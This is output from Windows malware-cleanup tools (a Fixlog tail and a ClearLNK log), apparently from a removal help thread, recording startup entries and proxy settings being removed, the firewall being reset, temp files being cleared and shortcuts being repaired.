              HKU\S-1-5-21-2746278279-2939389576-4119914495-1001\SOFTWARE\Microsoft\Windows\CurrentVersion\Exp lorer\StartupApproved\Run\BingSvc => value removed successfully
              HKU\S-1-5-21-2746278279-2939389576-4119914495-1001\SOFTWARE\Microsoft\Windows\CurrentVersion\Run \BingSvc => value not found.
              HKU\S-1-5-21-2746278279-2939389576-4119914495-1001\SOFTWARE\Microsoft\Windows\CurrentVersion\Exp lorer\StartupApproved\Run\Skype => value removed successfully
              HKU\S-1-5-21-2746278279-2939389576-4119914495-1001\SOFTWARE\Microsoft\Windows\CurrentVersion\Run \Skype => value removed successfully
              HKU\S-1-5-21-2746278279-2939389576-4119914495-1001\SOFTWARE\Microsoft\Windows\CurrentVersion\Exp lorer\StartupApproved\Run\Spotify => value removed successfully
              HKU\S-1-5-21-2746278279-2939389576-4119914495-1001\SOFTWARE\Microsoft\Windows\CurrentVersion\Run \Spotify => value removed successfully
              HKU\S-1-5-21-2746278279-2939389576-4119914495-1001\SOFTWARE\Microsoft\Windows\CurrentVersion\Exp lorer\StartupApproved\Run\Spotify Web Helper => value removed successfully
              HKU\S-1-5-21-2746278279-2939389576-4119914495-1001\SOFTWARE\Microsoft\Windows\CurrentVersion\Run \Spotify Web Helper => value removed successfully
              HKU\S-1-5-21-2746278279-2939389576-4119914495-1001\SOFTWARE\Microsoft\Windows\CurrentVersion\Exp lorer\StartupApproved\Run\CCleaner Monitoring => value removed successfully
              HKU\S-1-5-21-2746278279-2939389576-4119914495-1001\SOFTWARE\Microsoft\Windows\CurrentVersion\Run \CCleaner Monitoring => value not found.
              HKU\S-1-5-21-2746278279-2939389576-4119914495-1001\SOFTWARE\Microsoft\Windows\CurrentVersion\Exp lorer\StartupApproved\Run\PPBFY9hyTL.exe => value removed successfully
              HKU\S-1-5-21-2746278279-2939389576-4119914495-1001\SOFTWARE\Microsoft\Windows\CurrentVersion\Run \PPBFY9hyTL.exe => value removed successfully
              HKU\S-1-5-21-2746278279-2939389576-4119914495-1001\SOFTWARE\Microsoft\Windows\CurrentVersion\Exp lorer\StartupApproved\Run\AdobeBridge => value removed successfully
              HKU\S-1-5-21-2746278279-2939389576-4119914495-1001\SOFTWARE\Microsoft\Windows\CurrentVersion\Run \AdobeBridge => value not found.

              ========= RemoveProxy: =========

              HKU.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVers ion\Internet Settings\Connections\DefaultConnectionSettings => value removed successfully
              HKU.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVers ion\Internet Settings\Connections\SavedLegacySettings => value removed successfully
              HKU\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Inter net Settings\Connections\DefaultConnectionSettings => value removed successfully
              HKU\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Inter net Settings\Connections\SavedLegacySettings => value removed successfully
              HKU\S-1-5-21-2746278279-2939389576-4119914495-1001\SOFTWARE\Microsoft\Windows\CurrentVersion\Int ernet Settings\Connections\DefaultConnectionSettings => value removed successfully
              HKU\S-1-5-21-2746278279-2939389576-4119914495-1001\SOFTWARE\Microsoft\Windows\CurrentVersion\Int ernet Settings\Connections\SavedLegacySettings => value removed successfully

              ========= End of RemoveProxy: =========

              ========= netsh advfirewall reset =========

              Ok.

              ========= End of CMD: =========

              ========= netsh advfirewall set allprofiles state On =========

              Ok.

              ========= End of CMD: =========

              ========= ipconfig /flushdns =========

              Windows IP Configuration

              Successfully flushed the DNS Resolver Cache.

              ========= End of CMD: =========

              =========== EmptyTemp: ==========

              BITS transfer queue => 0 B
              DOMStore, IE Recovery, AppCache, Feeds Cache, Thumbcache, IconCache => 40724612 B
              Java, Flash, Steam htmlcache => 565 B
              Windows/system/drivers => 32020284 B
              Edge => 0 B
              Chrome => 621151357 B
              Firefox => 30022113 B
              Opera => 0 B

              Temp, IE cache, history, cookies, recent:
              Default => 0 B
              Users => 0 B
              ProgramData => 0 B
              Public => 0 B
              systemprofile => 128 B
              systemprofile32 => 128 B
              LocalService => 0 B
              NetworkService => -15852044 B
              defaultuser0 => 128 B
              ASUS => 48460057 B

              RecycleBin => 1807 B
              EmptyTemp: => 721.5 MB temporary data Removed.

              ================================

              The system needed a reboot.

              ==== End of Fixlog 04:42:34 ====

              CLEARLNK.LOG
              ClearLNK by Alex Dragokas ver. 2.9.0.11

              OS: x64 Windows 10 Enterprise, 10.0.14393, Service Pack: 0
              Time: 01.04.2017 - 04:50
              Language: OS: en-GB (0x809). Display: en-GB (0x809). Non-Unicode: EN (0x409)
              Elevated: Yes
              User: ASUS (group: Administrator)

              _____________________________ Begin of Log ______________________________
              .
              [ OK ] 1 “C:\ProgramData\Microsoft\Windows\Start Menu Places\01 - File Explorer.lnk” → [ “C:\Windows\explorer.exe” ] (icon has been recovered)
              [ OK ] 23 “C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Mozilla Firefox.lnk” → [ “C:\Program Files (x86)\Mozilla Firefox\firefox.exe” ] (Method R3-A2) (OK)
              [ OK ] 32 “C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Zemana AntiMalware\Zemana AntiMalware.lnk” → [ “D:\Program Files (x86)\Zemana AntiMalware\ZAM.exe” ] (icon has been recovered)
              [ OK ] 40 “C:\ProgramData\Microsoft\Windows\Start Menu\Programs\System Tools\Windows Defender.lnk” → [ “C:\Program Files\Windows Defender\MSASCui.exe” ] (icon has been recovered)
              [ OK ] 51 “C:\ProgramData\Microsoft\Windows\Start Menu\Programs\K-Lite Codec Pack\Codec Tweak Tool.lnk” → [ “C:\Program Files (x86)\K-Lite Codec Pack\Tools\CodecTweakTool.exe” ] (icon has been recovered)
              [ OK ] 53 “C:\ProgramData\Microsoft\Windows\Start Menu\Programs\K-Lite Codec Pack\Uninstall\Uninstall K-Lite Codec Pack.lnk” → [ “C:\Program Files (x86)\K-Lite Codec Pack\unins000.exe” ] (icon has been recovered)
              [ OK ] 72 “C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Administrative Tools\Component Services.lnk” → [ “C:\Windows\System32\comexp.msc” ] (icon has been recovered)
              [ OK ] 73 “C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Administrative Tools\dfrgui.lnk” → [ “C:\Windows\System32\dfrgui.exe” ] (icon has been recovered)
              [ OK ] 74 “C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Administrative Tools\Disk Cleanup.lnk” → [ “C:\Windows\System32\cleanmgr.exe” ] (icon has been recovered)
              [ OK ] 75 “C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Administrative Tools\iSCSI Initiator.lnk” → [ “C:\Windows\System32\iscsicpl.exe” ] (icon has been recovered)
              [ OK ] 76 “C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Administrative Tools\Memory Diagnostics Tool.lnk” → [ “C:\Windows\system32\MdSched.exe” ] (icon has been recovered)
              [ OK ] 77 “C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Administrative Tools\ODBC Data Sources (32-bit).lnk” → [ “C:\Windows\SysWOW64\odbcad32.exe” ] (icon has been recovered)
              [ OK ] 78 “C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Administrative Tools\ODBC Data Sources (64-bit).lnk” → [ “C:\Windows\System32\odbcad32.exe” ] (icon has been recovered)
              [ OK ] 79 “C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Administrative Tools\Print Management.lnk” → [ “C:\Windows\system32\printmanagement.msc” ] (icon has been recovered)
              [ OK ] 80 “C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Administrative Tools\services.lnk” → [ “C:\Windows\System32\services.msc” ] (icon has been recovered)
              [ OK ] 81 “C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Administrative Tools\System Configuration.lnk” → [ “C:\Windows\system32\msconfig.exe” ] (icon has been recovered)
              [ OK ] 82 “C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Administrative Tools\System Information.lnk” → [ “C:\Windows\System32\msinfo32.exe” ] (icon has been recovered)
              [ OK ] 83 “C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Administrative Tools\Windows Firewall with Advanced Security.lnk” → [ “C:\Windows\System32\WF.msc” ] (icon has been recovered)
              [ OK ] 87 “C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Math Input Panel.lnk” → [ “C:\Program Files\Common Files\microsoft shared\ink\mip.exe” ] (icon has been recovered)
              [ OK ] 88 “C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Paint.lnk” → [ “C:\Windows\System32\mspaint.exe” ] (icon has been recovered)
              [ OK ] 89 “C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Quick Assist.lnk” → [ “C:\Windows\system32\quickassist.exe” ] (icon has been recovered)
              [ OK ] 90 “C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Remote Desktop Connection.lnk” → [ “C:\Windows\System32\mstsc.exe” ] (icon has been recovered)
              [ OK ] 91 “C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Snipping Tool.lnk” → [ “C:\Windows\system32\SnippingTool.exe” ] (icon has been recovered)
              [ OK ] 92 “C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Steps Recorder.lnk” → [ “C:\Windows\System32\psr.exe” ] (icon has been recovered)
              [ OK ] 93 “C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows Fax and Scan.lnk” → [ “C:\Windows\system32\WFS.exe” ] (icon has been recovered)
              [ OK ] 94 “C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Wordpad.lnk” → [ “C:\Program Files (x86)\Windows NT\Accessories\wordpad.exe” ] (icon has been recovered)
              [ OK ] 95 “C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\XPS Viewer.lnk” → [ “C:\Windows\System32\xpsrchvw.exe” ] (icon has been recovered)
              [ OK ] 96 “C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\System Tools\Character Map.lnk” → [ “C:\Windows\System32\charmap.exe” ] (icon has been recovered)
              [ OK ] 117 “C:\Users\ASUS\AppData\Roaming\Microsoft\Windows\S tart Menu\Programs\Windows PowerShell\Windows PowerShell (x86).lnk” → [ “C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powers hell.exe” ] (icon has been recovered)
              [ OK ] 118 “C:\Users\ASUS\AppData\Roaming\Microsoft\Windows\S tart Menu\Programs\Windows PowerShell\Windows PowerShell ISE (x86).lnk” → [ “C:\Windows\SysWOW64\WindowsPowerShell\v1.0\PowerS hell_ISE.exe” ] (icon has been recovered)
              [ OK ] 119 “C:\Users\ASUS\AppData\Roaming\Microsoft\Windows\S tart Menu\Programs\Windows PowerShell\Windows PowerShell ISE.lnk” → [ “C:\Windows\System32\WindowsPowerShell\v1.0\PowerS hell_ISE.exe” ] (icon has been recovered)
              [ OK ] 120 “C:\Users\ASUS\AppData\Roaming\Microsoft\Windows\S tart Menu\Programs\Windows PowerShell\Windows PowerShell.lnk” → [ “C:\Windows\System32\WindowsPowerShell\v1.0\powers hell.exe” ] (icon has been recovered)
              [ OK ] 131 “C:\Users\ASUS\AppData\Roaming\Microsoft\Windows\S tart Menu\Programs\Accessories\Notepad.lnk” → [ “C:\Windows\System32\notepad.exe” ] (icon has been recovered)
              [ OK ] 132 “C:\Users\ASUS\AppData\Roaming\Microsoft\Windows\S tart Menu\Programs\Accessibility\Magnify.lnk” → [ “C:\Windows\System32\Magnify.exe” ] (icon has been recovered)
              [ OK ] 133 “C:\Users\ASUS\AppData\Roaming\Microsoft\Windows\S tart Menu\Programs\Accessibility\Narrator.lnk” → [ “C:\Windows\system32\narrator.exe” ] (icon has been recovered)
              [ OK ] 134 “C:\Users\ASUS\AppData\Roaming\Microsoft\Windows\S tart Menu\Programs\Accessibility\On-Screen Keyboard.lnk” → [ “C:\Windows\System32\osk.exe” ] (icon has been recovered)
              [ OK ] 141 “C:\Users\ASUS\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Internet Explorer.lnk” → [ “C:\Program Files (x86)\Internet Explorer\iexplore.exe” ] (Method R5-A2) (OK)
              [ OK ] 144 “C:\Users\ASUS\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\ImplicitAppShortcuts\e2c643ea365188f1\Googl e Chrome.lnk” → [ “C:\Program Files (x86)\Google\Chrome\Application\chrome.exe” ] (Method R5-A2) (OK)
              [ OK ] 146 “C:\Users\ASUS\AppData\Local\Microsoft\Windows\Win X\Group3\01a - Windows PowerShell.lnk” → [ “C:\Windows\System32\WindowsPowerShell\v1.0\powers hell.exe” ] (icon has been recovered)
              [ OK ] 148 “C:\Users\ASUS\AppData\Local\Microsoft\Windows\Win X\Group3\02a - Windows PowerShell.lnk” → [ “C:\Windows\System32\WindowsPowerShell\v1.0\powers hell.exe” ] (icon has been recovered)
              [ OK ] 154 “C:\Users\ASUS\AppData\Local\Google\Chrome\User Data\Chrome App Launcher.lnk” → [ “C:\Program Files (x86)\Google\Chrome\Application\chrome.exe” --show-app-list ] (Method R3-A2) (OK)
              [ OK ] 155 “C:\Users\Default\AppData\Roaming\Microsoft\Window s\Start Menu\Programs\Windows PowerShell\Windows PowerShell (x86).lnk” → [ “C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powers hell.exe” ] (icon has been recovered)
              [ OK ] 156 “C:\Users\Default\AppData\Roaming\Microsoft\Window s\Start Menu\Programs\Windows PowerShell\Windows PowerShell ISE (x86).lnk” → [ “C:\Windows\SysWOW64\WindowsPowerShell\v1.0\PowerS hell_ISE.exe” ] (icon has been recovered)
              [ OK ] 157 “C:\Users\Default\AppData\Roaming\Microsoft\Window s\Start Menu\Programs\Windows PowerShell\Windows PowerShell ISE.lnk” → [ “C:\Windows\System32\WindowsPowerShell\v1.0\PowerS hell_ISE.exe” ] (icon has been recovered)
              [ OK ] 158 “C:\Users\Default\AppData\Roaming\Microsoft\Window s\Start Menu\Programs\Windows PowerShell\Windows PowerShell.lnk” → [ “C:\Windows\System32\WindowsPowerShell\v1.0\powers hell.exe” ] (icon has been recovered)
              [ OK ] 164 “C:\Users\Default\AppData\Roaming\Microsoft\Window s\Start Menu\Programs\Accessories\Notepad.lnk” → [ “C:\Windows\System32\notepad.exe” ] (icon has been recovered)
              [ OK ] 165 “C:\Users\Default\AppData\Roaming\Microsoft\Window s\Start Menu\Programs\Accessibility\Magnify.lnk” → [ “C:\Windows\System32\Magnify.exe” ] (icon has been recovered)
              [ OK ] 166 “C:\Users\Default\AppData\Roaming\Microsoft\Window s\Start Menu\Programs\Accessibility\Narrator.lnk” → [ “C:\Windows\system32\narrator.exe” ] (icon has been recovered)
              [ OK ] 167 “C:\Users\Default\AppData\Roaming\Microsoft\Window s\Start Menu\Programs\Accessibility\On-Screen Keyboard.lnk” → [ “C:\Windows\System32\osk.exe” ] (icon has been recovered)
              [ OK ] 171 “C:\Users\Default\AppData\Local\Microsoft\Windows\ WinX\Group3\01a - Windows PowerShell.lnk” → [ “C:\Windows\System32\WindowsPowerShell\v1.0\powers hell.exe” ] (icon has been recovered)
              [ OK ] 173 “C:\Users\Default\AppData\Local\Microsoft\Windows\ WinX\Group3\02a - Windows PowerShell.lnk” → [ “C:\Windows\System32\WindowsPowerShell\v1.0\powers hell.exe” ] (icon has been recovered)
              [ OK ] 179 “C:\Users\defaultuser0\AppData\Roaming\Microsoft\W indows\Start Menu\Programs\Windows PowerShell\Windows PowerShell (x86).lnk” → [ “C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powers hell.exe” ] (icon has been recovered)
              [ OK ] 180 “C:\Users\defaultuser0\AppData\Roaming\Microsoft\W indows\Start Menu\Programs\Windows PowerShell\Windows PowerShell ISE (x86).lnk” → [ “C:\Windows\SysWOW64\WindowsPowerShell\v1.0\PowerS hell_ISE.exe” ] (icon has been recovered)
              [ OK ] 181 “C:\Users\defaultuser0\AppData\Roaming\Microsoft\W indows\Start Menu\Programs\Windows PowerShell\Windows PowerShell ISE.lnk” → [ “C:\Windows\System32\WindowsPowerShell\v1.0\PowerS hell_ISE.exe” ] (icon has been recovered)
              [ OK ] 182 “C:\Users\defaultuser0\AppData\Roaming\Microsoft\W indows\Start Menu\Programs\Windows PowerShell\Windows PowerShell.lnk” → [ “C:\Windows\System32\WindowsPowerShell\v1.0\powers hell.exe” ] (icon has been recovered)
              [ OK ] 188 “C:\Users\defaultuser0\AppData\Roaming\Microsoft\W indows\Start Menu\Programs\Accessories\Notepad.lnk” → [ “C:\Windows\System32\notepad.exe” ] (icon has been recovered)
              [ OK ] 189 “C:\Users\defaultuser0\AppData\Roaming\Microsoft\W indows\Start Menu\Programs\Accessibility\Magnify.lnk” → [ “C:\Windows\System32\Magnify.exe” ] (icon has been recovered)
              [ OK ] 190 “C:\Users\defaultuser0\AppData\Roaming\Microsoft\W indows\Start Menu\Programs\Accessibility\Narrator.lnk” → [ “C:\Windows\system32\narrator.exe” ] (icon has been recovered)
              [ OK ] 191 “C:\Users\defaultuser0\AppData\Roaming\Microsoft\W indows\Start Menu\Programs\Accessibility\On-Screen Keyboard.lnk” → [ “C:\Windows\System32\osk.exe” ] (icon has been recovered)
              [ OK ] 195 “C:\Users\defaultuser0\AppData\Local\Microsoft\Win dows\WinX\Group3\01a - Windows PowerShell.lnk” → [ “C:\Windows\System32\WindowsPowerShell\v1.0\powers hell.exe” ] (icon has been recovered)
              [ OK ] 197 “C:\Users\defaultuser0\AppData\Local\Microsoft\Win dows\WinX\Group3\02a - Windows PowerShell.lnk” → [ “C:\Windows\System32\WindowsPowerShell\v1.0\powers hell.exe” ] (icon has been recovered)
              [ OK ] 208 “C:\Users\Public\Desktop\Mozilla Firefox.lnk” → [ “C:\Program Files (x86)\Mozilla Firefox\firefox.exe” ] (Method R3-A2) (OK)
              [ OK ] 211 “C:\Users\Public\Desktop\Zemana AntiMalware.lnk” → [ “D:\Program Files (x86)\Zemana AntiMalware\ZAM.exe” ] (icon has been recovered)
              [ OK ] 212 “C:\ProgramData\Microsoft\Windows\Start Menu\Programs\System Tools\Task Manager.lnk” → [ “C:\Windows\System32\Taskmgr.exe” ] (Method RN-S) (OK)
              [ OK ] 213 “C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Razer\Razer Synapse\Razer Synapse.lnk” → [ “C:\Program Files (x86)\Razer\Synapse\RzSynapse.exe” ] (Method RN-S) (OK)
              [ OK ] 214 “C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Ragnarok Online\Uninstall.lnk” → [ “C:\Windows\SysWOW64\msiexec.exe” ] (Method RN-S) (OK)
              [ OK ] 215 “C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Microsoft Office 2016 Tools\Database Compare 2016.lnk” → [ “C:\Program Files\Microsoft Office\root\client\AppVLP.exe” ] (Method RN-S) (OK)
              [ OK ] 216 “C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Microsoft Office 2016 Tools\Office 2016 Upload Center.lnk” → [ “C:\Program Files\Microsoft Office\root\client\AppVLP.exe” ] (Method RN-S) (OK)
              [ OK ] 217 “C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Microsoft Office 2016 Tools\Project Server 2016 Accounts.lnk” → [ “C:\Program Files\Microsoft Office\root\Office16\WINPROJ.EXE” ] (Method RN-S) (OK)
              [ OK ] 218 “C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Microsoft Office 2016 Tools\Spreadsheet Compare 2016.lnk” → [ “C:\Program Files\Microsoft Office\root\client\AppVLP.exe” ] (Method RN-S) (OK)
              [ OK ] 219 “C:\ProgramData\Microsoft\Windows\Start Menu\Programs\K-Lite Codec Pack\Configuration\DirectVobSub.lnk” → [ “C:\Windows\System32\rundll32.exe” ] (Method RN-S) (OK)
              [ OK ] 220 “C:\ProgramData\Microsoft\Windows\Start Menu\Programs\K-Lite Codec Pack\Configuration\ffdshow VFW interface.lnk” → [ “C:\Windows\SysWOW64\rundll32.exe” ] (Method RN-S) (OK)
              [ OK ] 221 “C:\ProgramData\Microsoft\Windows\Start Menu\Programs\K-Lite Codec Pack\Configuration\LAV Audio.lnk” → [ “C:\Windows\System32\rundll32.exe” ] (Method RN-S) (OK)
              [ OK ] 222 “C:\ProgramData\Microsoft\Windows\Start Menu\Programs\K-Lite Codec Pack\Configuration\LAV Splitter.lnk” → [ “C:\Windows\System32\rundll32.exe” ] (Method RN-S) (OK)
              [ OK ] 223 “C:\ProgramData\Microsoft\Windows\Start Menu\Programs\K-Lite Codec Pack\Configuration\LAV Video.lnk” → [ “C:\Windows\System32\rundll32.exe” ] (Method RN-S) (OK)
              [ OK ] 224 “C:\ProgramData\Microsoft\Windows\Start Menu\Programs\K-Lite Codec Pack\Configuration\madVR.lnk” → [ “C:\Program Files (x86)\K-Lite Codec Pack\Filters\madVR\madHcCtrl.exe” ] (Method RN-S) (OK)
              [ OK ] 225 “C:\ProgramData\Microsoft\Windows\Start Menu\Programs\K-Lite Codec Pack\Configuration\x264 VFW (x64).lnk” → [ “C:\Windows\System32\rundll32.exe” ] (Method RN-S) (OK)
              [ OK ] 226 “C:\ProgramData\Microsoft\Windows\Start Menu\Programs\K-Lite Codec Pack\Configuration\x264 VFW (x86).lnk” → [ “C:\Windows\SysWOW64\rundll32.exe” ] (Method RN-S) (OK)
              [ OK ] 227 “C:\ProgramData\Microsoft\Windows\Start Menu\Programs\K-Lite Codec Pack\Configuration\Xvid VFW.lnk” → [ “C:\Windows\System32\rundll32.exe” ] (Method RN-S) (OK)
              [ OK ] 229 “C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Administrative Tools\Computer Management.lnk” → [ “C:\Windows\System32\compmgmt.msc” ] (Method RN-S) (OK)
              [ OK ] 230 “C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Administrative Tools\Event Viewer.lnk” → [ “C:\Windows\System32\eventvwr.msc” ] (Method RN-S) (OK)
              [ OK ] 231 “C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Administrative Tools\Performance Monitor.lnk” → [ “C:\Windows\System32\perfmon.msc” ] (Method RN-S) (OK)
              [ OK ] 232 “C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Administrative Tools\Resource Monitor.lnk” → [ “C:\Windows\System32\perfmon.exe” ] (Method RN-S) (OK)
              [ OK ] 233 “C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Administrative Tools\Security Configuration Management.lnk” → [ “C:\Windows\system32\secpol.msc” ] (Method RN-S) (OK)
              [ OK ] 234 “C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Administrative Tools\Task Scheduler.lnk” → [ “C:\Windows\System32\taskschd.msc” ] (Method RN-S) (OK)
              [ OK ] 235 “C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows Media Player.lnk” → [ “C:\Program Files (x86)\Windows Media Player\wmplayer.exe” ] (Method RN-S) (OK)
              [ OK ] 236 “C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessibility\Speech Recognition.lnk” → [ “C:\Windows\Speech\Common\sapisvr.exe” ] (Method RN-S) (OK)
              [ OK ] 237 “C:\Users\ASUS\Desktop\Pinned to Taskbar\Ragexe.lnk” → [ “D:\Games\Ragnarok\iRO\Gravity\openkore\Ragnarok Online\Ragexe.exe” ] (Method RN-S) (OK)
              [ OK ] 240 “C:\Users\ASUS\AppData\Roaming\Microsoft\Windows\S endTo\Fax Recipient.lnk” → [ “C:\Windows\System32\wfs.exe” ] (Method RN-S) (OK)
              [ OK ] 241 “C:\Users\ASUS\AppData\Roaming\Microsoft\Windows\S endTo\Skype.lnk” → [ “C:\Program Files (x86)\Skype\Phone\Skype.exe” ] (Method RN-S) (OK)
              [ OK ] 242 “C:\Users\ASUS\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Ragexe.lnk” → [ “D:\Games\Ragnarok\iRO\Gravity\openkore\Ragnarok Online\Ragexe.exe” ] (Method RN-S) (OK)
              [ OK ] 243 “C:\Users\ASUS\AppData\Local\Microsoft\Windows\Win X\Group3\04-1 - Network Connections.lnk” → [ “C:\Windows\explorer.exe” ] (Method RN-S) (OK)
              [ OK ] 244 “C:\Users\ASUS\AppData\Local\Microsoft\Windows\Win X\Group3\05 - Device Manager.lnk” → [ “C:\Windows\System32\control.exe” ] (Method RN-S) (OK)
              [ OK ] 245 “C:\Users\ASUS\AppData\Local\Microsoft\Windows\Win X\Group3\06 - System.lnk” → [ “C:\Windows\System32\control.exe” ] (Method RN-S) (OK)
              [ OK ] 246 “C:\Users\ASUS\AppData\Local\Microsoft\Windows\Win X\Group3\08 - Power Options.lnk” → [ “C:\Windows\System32\control.exe” ] (Method RN-S) (OK)
              [ OK ] 247 “C:\Users\ASUS\AppData\Local\Microsoft\Windows\Win X\Group3\10 - Programs and Features.lnk” → [ “C:\Windows\System32\control.exe” ] (Method RN-S) (OK)
              [ OK ] 248 “C:\Users\ASUS\AppData\Local\Microsoft\Windows\Win X\Group2\1 - Run.lnk” → [ “C:\Windows\explorer.exe” ] (Method RN-S) (OK)
              [ OK ] 249 “C:\Users\ASUS\AppData\Local\Microsoft\Windows\Win X\Group2\2 - Search.lnk” → [ “C:\Windows\explorer.exe” ] (Method RN-S) (OK)
              [ OK ] 250 “C:\Users\ASUS\AppData\Local\Microsoft\Windows\Win X\Group2\3 - Windows Explorer.lnk” → [ “C:\Windows\explorer.exe” ] (Method RN-S) (OK)
              [ OK ] 251 “C:\Users\ASUS\AppData\Local\Microsoft\Windows\Win X\Group2\5 - Task Manager.lnk” → [ “C:\Windows\System32\Taskmgr.exe” ] (Method RN-S) (OK)
              [ OK ] 252 “C:\Users\ASUS\AppData\Local\Microsoft\Windows\Win X\Group1\1 - Desktop.lnk” → [ “C:\Windows\explorer.exe” ] (Method RN-S) (OK)
              [ OK ] 255 “C:\Users\Default\AppData\Roaming\Microsoft\Window s\SendTo\Fax Recipient.lnk” → [ “C:\Windows\System32\wfs.exe” ] (Method RN-S) (OK)
              [ OK ] 256 “C:\Users\Default\AppData\Local\Microsoft\Windows\ WinX\Group3\04-1 - Network Connections.lnk” → [ “C:\Windows\explorer.exe” ] (Method RN-S) (OK)
              [ OK ] 257 “C:\Users\Default\AppData\Local\Microsoft\Windows\ WinX\Group3\05 - Device Manager.lnk” → [ “C:\Windows\System32\control.exe” ] (Method RN-S) (OK)
              [ OK ] 258 “C:\Users\Default\AppData\Local\Microsoft\Windows\ WinX\Group3\06 - System.lnk” → [ “C:\Windows\System32\control.exe” ] (Method RN-S) (OK)
              [ OK ] 259 “C:\Users\Default\AppData\Local\Microsoft\Windows\ WinX\Group3\08 - Power Options.lnk” → [ “C:\Windows\System32\control.exe” ] (Method RN-S) (OK)
              [ OK ] 260 “C:\Users\Default\AppData\Local\Microsoft\Windows\ WinX\Group3\10 - Programs and Features.lnk” → [ “C:\Windows\System32\control.exe” ] (Method RN-S) (OK)
              [ OK ] 261 “C:\Users\Default\AppData\Local\Microsoft\Windows\ WinX\Group2\1 - Run.lnk” → [ “C:\Windows\explorer.exe” ] (Method RN-S) (OK)
              [ OK ] 262 “C:\Users\Default\AppData\Local\Microsoft\Windows\ WinX\Group2\2 - Search.lnk” → [ “C:\Windows\explorer.exe” ] (Method RN-S) (OK)
              [ OK ] 263 “C:\Users\Default\AppData\Local\Microsoft\Windows\ WinX\Group2\3 - Windows Explorer.lnk” → [ “C:\Windows\explorer.exe” ] (Method RN-S) (OK)
              [ OK ] 264 “C:\Users\Default\AppData\Local\Microsoft\Windows\ WinX\Group2\5 - Task Manager.lnk” → [ “C:\Windows\System32\Taskmgr.exe” ] (Method RN-S) (OK)
              [ OK ] 265 “C:\Users\Default\AppData\Local\Microsoft\Windows\ WinX\Group1\1 - Desktop.lnk” → [ “C:\Windows\explorer.exe” ] (Method RN-S) (OK)
              [ OK ] 268 “C:\Users\defaultuser0\AppData\Roaming\Microsoft\W indows\SendTo\Fax Recipient.lnk” → [ “C:\Windows\System32\wfs.exe” ] (Method RN-S) (OK)
              [ OK ] 269 “C:\Users\defaultuser0\AppData\Local\Microsoft\Win dows\WinX\Group3\04-1 - Network Connections.lnk” → [ “C:\Windows\explorer.exe” ] (Method RN-S) (OK)
              [ OK ] 270 “C:\Users\defaultuser0\AppData\Local\Microsoft\Win dows\WinX\Group3\05 - Device Manager.lnk” → [ “C:\Windows\System32\control.exe” ] (Method RN-S) (OK)
              [ OK ] 271 “C:\Users\defaultuser0\AppData\Local\Microsoft\Win dows\WinX\Group3\06 - System.lnk” → [ “C:\Windows\System32\control.exe” ] (Method RN-S) (OK)
              [ OK ] 272 “C:\Users\defaultuser0\AppData\Local\Microsoft\Win dows\WinX\Group3\08 - Power Options.lnk” → [ “C:\Windows\System32\control.exe” ] (Method RN-S) (OK)
              [ OK ] 273 “C:\Users\defaultuser0\AppData\Local\Microsoft\Win dows\WinX\Group3\10 - Programs and Features.lnk” → [ “C:\Windows\System32\control.exe” ] (Method RN-S) (OK)
              [ OK ] 274 “C:\Users\defaultuser0\AppData\Local\Microsoft\Win dows\WinX\Group2\1 - Run.lnk” → [ “C:\Windows\explorer.exe” ] (Method RN-S) (OK)
              [ OK ] 275 “C:\Users\defaultuser0\AppData\Local\Microsoft\Win dows\WinX\Group2\2 - Search.lnk” → [ “C:\Windows\explorer.exe” ] (Method RN-S) (OK)
              [ OK ] 276 “C:\Users\defaultuser0\AppData\Local\Microsoft\Win dows\WinX\Group2\3 - Windows Explorer.lnk” → [ “C:\Windows\explorer.exe” ] (Method RN-S) (OK)
              [ OK ] 277 “C:\Users\defaultuser0\AppData\Local\Microsoft\Win dows\WinX\Group2\5 - Task Manager.lnk” → [ “C:\Windows\System32\Taskmgr.exe” ] (Method RN-S) (OK)
